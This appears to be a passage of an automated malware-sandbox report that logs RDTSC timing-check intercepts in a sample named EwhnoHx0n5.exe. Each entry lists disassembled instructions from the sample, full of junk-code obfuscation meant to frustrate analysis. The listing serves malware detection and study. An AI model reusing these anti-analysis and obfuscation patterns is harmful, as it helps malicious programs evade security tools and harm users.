Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: 71C0F92 second address: 71C1061 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 call 00007FCBA141FCB4h 0x00000009 jmp 00007FCBA141FCB2h 0x0000000e pop ecx 0x0000000f popad 0x00000010 jne 00007FCC111FE3C4h 0x00000016 jmp 00007FCBA141FCB1h 0x0000001b mov edx, dword ptr [ebp+08h] 0x0000001e pushad 0x0000001f push ecx 0x00000020 mov si, bx 0x00000023 pop edx 0x00000024 pushfd 0x00000025 jmp 00007FCBA141FCB4h 0x0000002a and ax, 4228h 0x0000002f jmp 00007FCBA141FCABh 0x00000034 popfd 0x00000035 popad 0x00000036 mov eax, dword ptr [esi] 0x00000038 pushad 0x00000039 mov dl, ch 0x0000003b pushfd 0x0000003c jmp 00007FCBA141FCB1h 0x00000041 adc esi, 2E163246h 0x00000047 jmp 00007FCBA141FCB1h 0x0000004c popfd 0x0000004d popad 0x0000004e mov dword ptr [edx], eax 0x00000050 jmp 00007FCBA141FCAEh 0x00000055 mov eax, dword ptr [esi+04h] 0x00000058 push eax 0x00000059 push edx 0x0000005a jmp 00007FCBA141FCB7h 0x0000005f rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: 71C1061 second address: 71C109B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCBA141C939h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [edx+04h], eax 0x0000000c jmp 00007FCBA141C92Eh 0x00000011 mov eax, dword ptr [esi+08h] 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 mov bl, C7h 0x00000019 movzx ecx, di 0x0000001c popad 0x0000001d rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: 71C109B second address: 71C10A1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: 71C10A1 second address: 71C10A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: 71C10A5 second address: 71C1106 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [edx+08h], eax 0x0000000b jmp 00007FCBA141FCB6h 0x00000010 mov eax, dword ptr [esi+0Ch] 0x00000013 jmp 00007FCBA141FCB0h 0x00000018 mov dword ptr [edx+0Ch], eax 0x0000001b pushad 0x0000001c mov edx, ecx 0x0000001e pushfd 0x0000001f jmp 00007FCBA141FCAAh 0x00000024 or eax, 564E1398h 0x0000002a jmp 00007FCBA141FCABh 0x0000002f popfd 0x00000030 popad 0x00000031 mov eax, dword ptr [esi+10h] 0x00000034 push eax 0x00000035 push edx 0x00000036 push eax 0x00000037 push edx 0x00000038 pushad 0x00000039 popad 0x0000003a rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: 71C1106 second address: 71C1121 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCBA141C937h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: 71C1121 second address: 71C116A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007FCBA141FCAFh 0x00000008 pop esi 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e mov dword ptr [edx+10h], eax 0x00000011 jmp 00007FCBA141FCB5h 0x00000016 mov eax, dword ptr [esi+14h] 0x00000019 pushad 0x0000001a push eax 0x0000001b push edx 0x0000001c pop ecx 0x0000001d pop edx 0x0000001e mov al, C1h 0x00000020 popad 0x00000021 mov dword ptr [edx+14h], eax 0x00000024 push eax 0x00000025 push edx 0x00000026 pushad 0x00000027 mov ax, CAEFh 0x0000002b mov bx, cx 0x0000002e popad 0x0000002f rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: 71C116A second address: 71C1170 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: 71C1170 second address: 71C1174 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: 71C1174 second address: 71C11A6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [esi+18h] 0x0000000b pushad 0x0000000c mov esi, edx 0x0000000e mov eax, edx 0x00000010 popad 0x00000011 mov dword ptr [edx+18h], eax 0x00000014 jmp 00007FCBA141C933h 0x00000019 mov eax, dword ptr [esi+1Ch] 0x0000001c push eax 0x0000001d push edx 0x0000001e pushad 0x0000001f mov ecx, edx 0x00000021 mov esi, edx 0x00000023 popad 0x00000024 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: 71C11A6 second address: 71C1243 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FCBA141FCB6h 0x00000009 sub eax, 7FA361D8h 0x0000000f jmp 00007FCBA141FCABh 0x00000014 popfd 0x00000015 mov ecx, 48A1008Fh 0x0000001a popad 0x0000001b pop edx 0x0000001c pop eax 0x0000001d mov dword ptr [edx+1Ch], eax 0x00000020 jmp 00007FCBA141FCB2h 0x00000025 mov eax, dword ptr [esi+20h] 0x00000028 pushad 0x00000029 pushad 0x0000002a mov eax, 4FE2E813h 0x0000002f mov cx, F26Fh 0x00000033 popad 0x00000034 call 00007FCBA141FCB4h 0x00000039 jmp 00007FCBA141FCB2h 0x0000003e pop ecx 0x0000003f popad 0x00000040 mov dword ptr [edx+20h], eax 0x00000043 jmp 00007FCBA141FCB1h 0x00000048 mov eax, dword ptr [esi+24h] 0x0000004b push eax 0x0000004c push edx 0x0000004d push eax 0x0000004e push edx 0x0000004f push eax 0x00000050 push edx 0x00000051 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: 71C1243 second address: 71C1247 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: 71C1247 second address: 71C124D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: 71C124D second address: 71C12C5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FCBA141C930h 0x00000009 sbb al, 00000058h 0x0000000c jmp 00007FCBA141C92Bh 0x00000011 popfd 0x00000012 pushfd 0x00000013 jmp 00007FCBA141C938h 0x00000018 sbb ah, FFFFFFB8h 0x0000001b jmp 00007FCBA141C92Bh 0x00000020 popfd 0x00000021 popad 0x00000022 pop edx 0x00000023 pop eax 0x00000024 mov dword ptr [edx+24h], eax 0x00000027 jmp 00007FCBA141C936h 0x0000002c mov eax, dword ptr [esi+28h] 0x0000002f push eax 0x00000030 push edx 0x00000031 push eax 0x00000032 push edx 0x00000033 jmp 00007FCBA141C92Ah 0x00000038 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: 71C12C5 second address: 71C12D4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCBA141FCABh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: 71C12D4 second address: 71C1349 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop esi 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [edx+28h], eax 0x0000000b jmp 00007FCBA141C92Dh 0x00000010 mov ecx, dword ptr [esi+2Ch] 0x00000013 pushad 0x00000014 mov ebx, eax 0x00000016 mov ax, 809Fh 0x0000001a popad 0x0000001b mov dword ptr [edx+2Ch], ecx 0x0000001e pushad 0x0000001f call 00007FCBA141C930h 0x00000024 pushad 0x00000025 popad 0x00000026 pop esi 0x00000027 pushfd 0x00000028 jmp 00007FCBA141C931h 0x0000002d sub ah, 00000076h 0x00000030 jmp 00007FCBA141C931h 0x00000035 popfd 0x00000036 popad 0x00000037 mov ax, word ptr [esi+30h] 0x0000003b push eax 0x0000003c push edx 0x0000003d jmp 00007FCBA141C92Dh 0x00000042 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: 71C1349 second address: 71C1399 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCBA141FCB1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov word ptr [edx+30h], ax 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 mov cx, dx 0x00000013 pushfd 0x00000014 jmp 00007FCBA141FCAFh 0x00000019 adc esi, 4428070Eh 0x0000001f jmp 00007FCBA141FCB9h 0x00000024 popfd 0x00000025 popad 0x00000026 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: 71C1399 second address: 71C13B6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edi, 2E93A822h 0x00000008 mov ax, di 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e mov ax, word ptr [esi+32h] 0x00000012 pushad 0x00000013 mov di, 5346h 0x00000017 push eax 0x00000018 push edx 0x00000019 mov di, E5A0h 0x0000001d rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: 71C13B6 second address: 71C13C8 instructions: 0x00000000 rdtsc 0x00000002 movsx edi, ax 0x00000005 pop edx 0x00000006 pop eax 0x00000007 popad 0x00000008 mov word ptr [edx+32h], ax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: 71C13C8 second address: 71C13CE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: 71C13CE second address: 71C1441 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edx, esi 0x00000005 pushfd 0x00000006 jmp 00007FCBA141FCAEh 0x0000000b adc cx, 0318h 0x00000010 jmp 00007FCBA141FCABh 0x00000015 popfd 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 mov eax, dword ptr [esi+34h] 0x0000001c jmp 00007FCBA141FCB6h 0x00000021 mov dword ptr [edx+34h], eax 0x00000024 jmp 00007FCBA141FCB0h 0x00000029 test ecx, 00000700h 0x0000002f push eax 0x00000030 push edx 0x00000031 jmp 00007FCBA141FCB7h 0x00000036 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: 71C1441 second address: 71C1464 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FCBA141C92Fh 0x00000008 mov ebx, eax 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d jne 00007FCC111FABE5h 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: 71C1464 second address: 71C1468 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: 71C1468 second address: 71C147F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCBA141C933h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: 71B0836 second address: 71B083A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: 71B083A second address: 71B0840 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: 71B0840 second address: 71B0846 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: 71B0846 second address: 71B084A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: 71B084A second address: 71B0894 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c call 00007FCBA141FCB5h 0x00000011 pop eax 0x00000012 pushfd 0x00000013 jmp 00007FCBA141FCB1h 0x00000018 adc cl, FFFFFFC6h 0x0000001b jmp 00007FCBA141FCB1h 0x00000020 popfd 0x00000021 popad 0x00000022 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: 7150073 second address: 7150083 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FCBA141C92Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: 7150655 second address: 7150659 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: 7150659 second address: 715065D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: 715065D second address: 7150663 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: 7150A07 second address: 7150A22 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCBA141C937h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: 7150A22 second address: 7150A78 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCBA141FCB9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e pushfd 0x0000000f jmp 00007FCBA141FCB3h 0x00000014 sbb cl, 0000000Eh 0x00000017 jmp 00007FCBA141FCB9h 0x0000001c popfd 0x0000001d pushad 0x0000001e popad 0x0000001f popad 0x00000020 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: 7150A78 second address: 7150A86 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FCBA141C92Ah 0x00000009 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: 71801A1 second address: 71801B9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FCBA141FCB4h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: 71801B9 second address: 71801EB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCBA141C92Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c pushad 0x0000000d mov dl, cl 0x0000000f mov dh, 29h 0x00000011 popad 0x00000012 push eax 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007FCBA141C935h 0x0000001c rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: 71801EB second address: 71801EF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: 71801EF second address: 71801F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: 71801F5 second address: 71801FB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: 71801FB second address: 71801FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: 71801FF second address: 7180264 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007FCBA141FCB7h 0x00000012 and cl, FFFFFF9Eh 0x00000015 jmp 00007FCBA141FCB9h 0x0000001a popfd 0x0000001b pushfd 0x0000001c jmp 00007FCBA141FCB0h 0x00000021 or esi, 1EDDEB98h 0x00000027 jmp 00007FCBA141FCABh 0x0000002c popfd 0x0000002d popad 0x0000002e rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: 7180264 second address: 718029F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCBA141C939h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FCBA141C938h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: 718029F second address: 71802AE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCBA141FCABh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: 71802AE second address: 718031B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edx, 464F7B7Ah 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b and esp, FFFFFFF0h 0x0000000e pushad 0x0000000f pushfd 0x00000010 jmp 00007FCBA141C92Ah 0x00000015 add cl, FFFFFFB8h 0x00000018 jmp 00007FCBA141C92Bh 0x0000001d popfd 0x0000001e mov ecx, 79B382EFh 0x00000023 popad 0x00000024 sub esp, 44h 0x00000027 push eax 0x00000028 push edx 0x00000029 pushad 0x0000002a pushfd 0x0000002b jmp 00007FCBA141C937h 0x00000030 add al, 0000002Eh 0x00000033 jmp 00007FCBA141C939h 0x00000038 popfd 0x00000039 push esi 0x0000003a pop edi 0x0000003b popad 0x0000003c rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: 718031B second address: 71803DC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FCBA141FCB3h 0x00000008 mov esi, 380F299Fh 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 xchg eax, ebx 0x00000011 pushad 0x00000012 mov di, ax 0x00000015 mov di, cx 0x00000018 popad 0x00000019 push eax 0x0000001a jmp 00007FCBA141FCB9h 0x0000001f xchg eax, ebx 0x00000020 pushad 0x00000021 pushfd 0x00000022 jmp 00007FCBA141FCACh 0x00000027 sbb cl, 00000068h 0x0000002a jmp 00007FCBA141FCABh 0x0000002f popfd 0x00000030 pushfd 0x00000031 jmp 00007FCBA141FCB8h 0x00000036 xor cx, BDC8h 0x0000003b jmp 00007FCBA141FCABh 0x00000040 popfd 0x00000041 popad 0x00000042 xchg eax, esi 0x00000043 jmp 00007FCBA141FCB6h 0x00000048 push eax 0x00000049 pushad 0x0000004a push eax 0x0000004b push edx 0x0000004c pushfd 0x0000004d jmp 00007FCBA141FCAAh 0x00000052 adc si, 8358h 0x00000057 jmp 00007FCBA141FCABh 0x0000005c popfd 0x0000005d rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: 71803DC second address: 7180413 instructions: 0x00000000 rdtsc 0x00000002 call 00007FCBA141C938h 0x00000007 pop eax 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b xchg eax, esi 0x0000000c jmp 00007FCBA141C931h 0x00000011 xchg eax, edi 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: 7180413 second address: 7180417 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: 7180417 second address: 718041D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: 718041D second address: 7180423 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: 718055D second address: 71805D1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCBA141C92Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov esp, ebp 0x0000000b jmp 00007FCBA141C936h 0x00000010 pop ebp 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 pushfd 0x00000015 jmp 00007FCBA141C92Dh 0x0000001a add ax, 4766h 0x0000001f jmp 00007FCBA141C931h 0x00000024 popfd 0x00000025 pushfd 0x00000026 jmp 00007FCBA141C930h 0x0000002b and esi, 22396F08h 0x00000031 jmp 00007FCBA141C92Bh 0x00000036 popfd 0x00000037 popad 0x00000038 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: 71805D1 second address: 71805D7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: 71805D7 second address: 71805DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: 71B08C0 second address: 71B08D0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FCBA141FCACh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: 71B08D0 second address: 71B0921 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ecx 0x00000009 pushad 0x0000000a movzx ecx, bx 0x0000000d mov edi, 686A926Ah 0x00000012 popad 0x00000013 mov dword ptr [esp], ebp 0x00000016 jmp 00007FCBA141C931h 0x0000001b mov ebp, esp 0x0000001d jmp 00007FCBA141C92Eh 0x00000022 pop ebp 0x00000023 push eax 0x00000024 push edx 0x00000025 jmp 00007FCBA141C937h 0x0000002a rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: 71B0921 second address: 71B0939 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FCBA141FCB4h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: 71B0939 second address: 71B093D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: 71A0908 second address: 71A090C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: 71A090C second address: 71A0912 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: 71A0912 second address: 71A0918 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: 71A0918 second address: 71A091C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: 71A091C second address: 71A0920 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: 71A0920 second address: 71A0931 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c mov esi, edx 0x0000000e pushad 0x0000000f popad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: 71A0931 second address: 71A095E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCBA141FCB8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FCBA141FCAEh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: 71A095E second address: 71A0964 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: 71A0964 second address: 71A0968 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: 71A0968 second address: 71A0987 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FCBA141C934h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: 71A0987 second address: 71A098D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: 71B0B0A second address: 71B0B2D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCBA141C931h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b call 00007FCBA141C92Ah 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
